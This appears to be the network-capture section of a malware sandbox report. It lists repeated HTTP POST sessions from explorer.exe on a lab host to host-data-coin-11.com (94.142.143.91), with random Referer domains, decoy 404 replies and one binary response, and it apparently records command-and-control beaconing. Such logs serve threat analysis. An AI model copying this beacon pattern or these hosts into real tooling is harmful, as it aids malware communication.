                                                                                                                                                                                                    Jan 14, 2022 04:59:15.927923918 CET3475OUTPOST / HTTP/1.1
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Referer: http://lxvicbnfu.com/
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                    Content-Length: 180
                                                                                                                                                                                                    Host: host-data-coin-11.com
                                                                                                                                                                                                    Jan 14, 2022 04:59:16.011801958 CET3476INHTTP/1.1 404 Not Found
                                                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                                                    Date: Fri, 14 Jan 2022 03:59:15 GMT
                                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                    35192.168.2.34981194.142.143.9180C:\Windows\explorer.exe
                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                    Jan 14, 2022 04:59:16.101794004 CET3477OUTPOST / HTTP/1.1
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Referer: http://alysw.org/
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                    Content-Length: 249
                                                                                                                                                                                                    Host: host-data-coin-11.com
                                                                                                                                                                                                    Jan 14, 2022 04:59:16.186861992 CET3478INHTTP/1.1 404 Not Found
                                                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                                                    Date: Fri, 14 Jan 2022 03:59:16 GMT
                                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                    36192.168.2.34981294.142.143.9180C:\Windows\explorer.exe
                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                    Jan 14, 2022 04:59:16.268343925 CET3479OUTPOST / HTTP/1.1
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Referer: http://yocfbwydo.net/
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                    Content-Length: 181
                                                                                                                                                                                                    Host: host-data-coin-11.com
                                                                                                                                                                                                    Jan 14, 2022 04:59:16.350084066 CET3479INHTTP/1.1 404 Not Found
                                                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                                                    Date: Fri, 14 Jan 2022 03:59:16 GMT
                                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    Data Raw: 32 63 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 90 df 1e 49 3a 44 a6 e8 de ea e4 40 fd 45 91 6e b8 57 5b 91 17 bf ec 31 e5 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 2cI:82OI:D@EnW[10


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                    37192.168.2.34982494.142.143.9180C:\Windows\explorer.exe
                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                    Jan 14, 2022 04:59:37.478473902 CET11358OUTPOST / HTTP/1.1
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Referer: http://gempx.org/
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                    Content-Length: 266
                                                                                                                                                                                                    Host: host-data-coin-11.com
                                                                                                                                                                                                    Jan 14, 2022 04:59:37.559830904 CET11359INHTTP/1.1 200 OK
                                                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                                                    Date: Fri, 14 Jan 2022 03:59:37 GMT
                                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                    Connection: close


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                    38192.168.2.34982694.142.143.9180C:\Windows\explorer.exe
                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                    Jan 14, 2022 04:59:37.649547100 CET11360OUTPOST / HTTP/1.1
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Referer: http://cnwtvll.org/
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                    Content-Length: 350
                                                                                                                                                                                                    Host: host-data-coin-11.com
                                                                                                                                                                                                    Jan 14, 2022 04:59:37.734066010 CET11363INHTTP/1.1 404 Not Found
                                                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                                                    Date: Fri, 14 Jan 2022 03:59:37 GMT
                                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                    39192.168.2.34982794.142.143.9180C:\Windows\explorer.exe
                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                    Jan 14, 2022 04:59:37.820666075 CET11363OUTPOST / HTTP/1.1
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Referer: http://ecigcmyd.org/
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                    Content-Length: 279
                                                                                                                                                                                                    Host: host-data-coin-11.com
                                                                                                                                                                                                    Jan 14, 2022 04:59:37.904429913 CET11366INHTTP/1.1 200 OK
                                                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                                                    Date: Fri, 14 Jan 2022 03:59:37 GMT
                                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                    Connection: close


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                    4192.168.2.349876144.76.136.153443C:\Windows\explorer.exe
                                                                                                                                                                                                    TimestampkBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                    40192.168.2.34983094.142.143.9180C:\Windows\explorer.exe
                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                    Jan 14, 2022 04:59:37.987737894 CET11369OUTPOST / HTTP/1.1
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Referer: http://qaicqimmrp.org/
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                    Content-Length: 340
                                                                                                                                                                                                    Host: host-data-coin-11.com
                                                                                                                                                                                                    Jan 14, 2022 04:59:38.072016001 CET11780INHTTP/1.1 200 OK
                                                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                                                    Date: Fri, 14 Jan 2022 03:59:38 GMT
                                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                    Connection: close


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                    41192.168.2.34983294.142.143.9180C:\Windows\explorer.exe
                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                    Jan 14, 2022 04:59:38.193926096 CET11896OUTPOST / HTTP/1.1
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Referer: http://lwrsn.com/
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                    Content-Length: 157
                                                                                                                                                                                                    Host: host-data-coin-11.com
                                                                                                                                                                                                    Jan 14, 2022 04:59:38.302746058 CET11921INHTTP/1.1 404 Not Found
                                                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                                                    Date: Fri, 14 Jan 2022 03:59:38 GMT
                                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                    42192.168.2.34983594.142.143.9180C:\Windows\explorer.exe
                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                    Jan 14, 2022 04:59:38.708915949 CET11925OUTPOST / HTTP/1.1
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Referer: http://lqdvrak.com/
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                    Content-Length: 151
                                                                                                                                                                                                    Host: host-data-coin-11.com
                                                                                                                                                                                                    Jan 14, 2022 04:59:38.818808079 CET11926INHTTP/1.1 404 Not Found
                                                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                                                    Date: Fri, 14 Jan 2022 03:59:38 GMT
                                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                    43192.168.2.34983794.142.143.9180C:\Windows\explorer.exe
                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                    Jan 14, 2022 04:59:38.903316975 CET11928OUTPOST / HTTP/1.1
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Referer: http://scugxyrh.org/
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                    Content-Length: 255
                                                                                                                                                                                                    Host: host-data-coin-11.com
                                                                                                                                                                                                    Jan 14, 2022 04:59:38.999663115 CET11930INHTTP/1.1 404 Not Found
                                                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                                                    Date: Fri, 14 Jan 2022 03:59:38 GMT
                                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                    44192.168.2.34983894.142.143.9180C:\Windows\explorer.exe
                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                    Jan 14, 2022 04:59:39.090161085 CET11931OUTPOST / HTTP/1.1
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Referer: http://lwwgdj.net/
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                    Content-Length: 269
                                                                                                                                                                                                    Host: host-data-coin-11.com
                                                                                                                                                                                                    Jan 14, 2022 04:59:39.178071976 CET11933INHTTP/1.1 404 Not Found
                                                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                                                    Date: Fri, 14 Jan 2022 03:59:39 GMT
                                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
